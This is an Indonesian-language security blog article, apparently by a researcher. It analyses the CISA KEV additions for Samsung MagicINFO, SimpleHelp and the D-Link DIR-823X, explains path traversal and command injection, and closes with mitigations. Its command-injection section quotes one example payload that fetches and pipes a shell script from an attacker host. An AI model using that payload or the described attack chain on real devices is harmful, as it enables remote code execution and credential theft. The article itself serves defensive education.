.png)
Dalam praktik vulnerability management modern, masalah utama bukan lagi jumlah CVE, tetapi prioritas yang salah. Banyak organisasi masih terpaku pada skor CVSS, sementara ancaman nyata justru berasal dari subset kecil vulnerability yang sudah terbukti dieksploitasi di lapangan. Penambahan empat vulnerability baru ke dalam Known Exploited Vulnerabilities (KEV) oleh CISA pada April 2026 mempertegas pola ini: attacker tidak mencari bug paling “tinggi skornya”, tetapi yang paling praktis untuk dijadikan entry point. CVE seperti CVE-2024-7399 (Samsung MagicINFO), CVE-2024-57726 dan CVE-2024-57728 (SimpleHelp), serta CVE-2025-29635 (D-Link DIR-823X) menunjukkan kombinasi klasik: akses awal lemah, validasi input yang tidak terfilter dengan baik, dan eksekusi perintah tanpa kontrol.
Secara teknis, dua pola dominan terlihat jelas: path traversal dan command injection. Pada kasus Samsung MagicINFO dan SimpleHelp, path traversal bekerja dengan memanipulasi input path (misalnya melalui parameter HTTP) untuk mengakses direktori di luar root yang diizinkan. Ini biasanya terjadi karena kurangnya normalisasi path atau filtering karakter seperti ../. Dalam banyak implementasi backend, fungsi file handling menerima input langsung tanpa canonicalization, sehingga attacker bisa membaca file sensitif seperti /etc/passwd, configuration file, atau bahkan credential storage. Ketika dikombinasikan dengan vulnerability lain seperti missing authorization (CVE-2024-57726), traversal ini tidak hanya menjadi read-only issue, tetapi berubah menjadi foothold awal untuk kompromi sistem yang lebih luas.
Pada sisi lain, command injection pada D-Link DIR-823X adalah bentuk eskalasi yang jauh lebih langsung. Vulnerability ini muncul ketika input user disisipkan ke dalam command shell tanpa sanitasi yang memadai. Secara teknis, ini biasanya terjadi pada fungsi seperti system(), exec(), atau wrapper shell di firmware perangkat. Jika input tidak di-escape dengan benar, attacker bisa menyisipkan payload seperti ; wget attacker.com/shell.sh | sh, yang mengarah pada remote code execution (RCE). Dalam konteks router, ini berarti kontrol penuh terhadap lalu lintas jaringan, termasuk DNS hijacking, traffic interception, hingga persistence melalui firmware modification.
Skenario eksploitasi realistis yang sering terjadi adalah chaining vulnerability, bukan eksploitasi tunggal. Misalnya, attacker menemukan instance SimpleHelp yang exposed ke internet. Dengan memanfaatkan missing authorization, attacker dapat mengakses endpoint internal tanpa login. Dari sana, path traversal digunakan untuk membaca file konfigurasi yang berisi credential atau API key. Credential tersebut kemudian digunakan untuk lateral movement atau akses ke sistem lain. Jika dalam jaringan yang sama terdapat perangkat seperti D-Link router yang rentan command injection, attacker bisa pivot dan mendapatkan kontrol jaringan secara menyeluruh. Ini selaras dengan pola serangan yang pernah diamati pada aktivitas kelompok seperti Storm-1175, yang menggabungkan teknik living-off-the-land dan tunneling (misalnya via Cloudflare) untuk menghindari deteksi.
Baca Juga Tentang: Analisis Serangan Storm-1775 Menggunakan CVE-2024-57726 dan CVE-2024-57728 - Ethical Hacking Indonesia
Dampaknya tidak hanya terbatas pada kompromi satu sistem. Dalam banyak kasus, vulnerability seperti ini menjadi entry point untuk supply chain compromise atau identity-based attack. Ketika attacker berhasil mengekstrak credential dari file konfigurasi atau environment variable, mereka tidak lagi membutuhkan eksploitasi teknis tambahan. Akses yang didapat bisa digunakan untuk masuk ke sistem cloud, CI/CD pipeline, atau bahkan endpoint lain yang mempercayai identitas tersebut. Ini menjelaskan mengapa vulnerability dengan kompleksitas rendah sering kali memiliki dampak strategis yang tinggi.
Dari sisi mitigasi, pendekatan tradisional seperti patching berkala sudah tidak cukup. KEV menuntut respons berbasis threat intelligence, bukan sekadar compliance. Untuk path traversal, mitigasi harus mencakup canonicalization path, penggunaan allowlist, dan isolasi file system melalui containerization atau chroot jail. Untuk command injection, sanitasi input saja tidak cukup; penggunaan API yang aman (misalnya tanpa shell invocation) jauh lebih disarankan. Selain itu, network segmentation menjadi krusial, terutama untuk perangkat seperti router yang sering diabaikan dalam asset inventory. Jika patch tidak tersedia atau sulit diterapkan, isolasi sistem dari jaringan adalah satu-satunya opsi defensif yang bisa meminimalisir hal yang tidak di inginkan terjadi pada infrastruktur.
Insight penting bagi praktisi adalah bahwa KEV bukan sekadar daftar vulnerability, tetapi representasi dari “attacker preference model”. Artinya, vulnerability yang masuk KEV adalah yang sudah terbukti memberikan ROI tinggi bagi attacker: mudah dieksploitasi, berdampak besar, dan sering ditemukan di environment nyata. Maka dari itu, strategi defensive yang efektif bukan hanya menutup bug, tetapi memahami bagaimana bug tersebut digunakan dalam rantai serangan. Tanpa perspektif ini, organisasi akan terus tertinggal, sibuk memperbaiki ribuan vulnerability yang tidak pernah benar-benar digunakan, sementara attacker sudah masuk melalui celah yang paling sederhana.
Benediktus Sava – Security Researcher
Sumber:
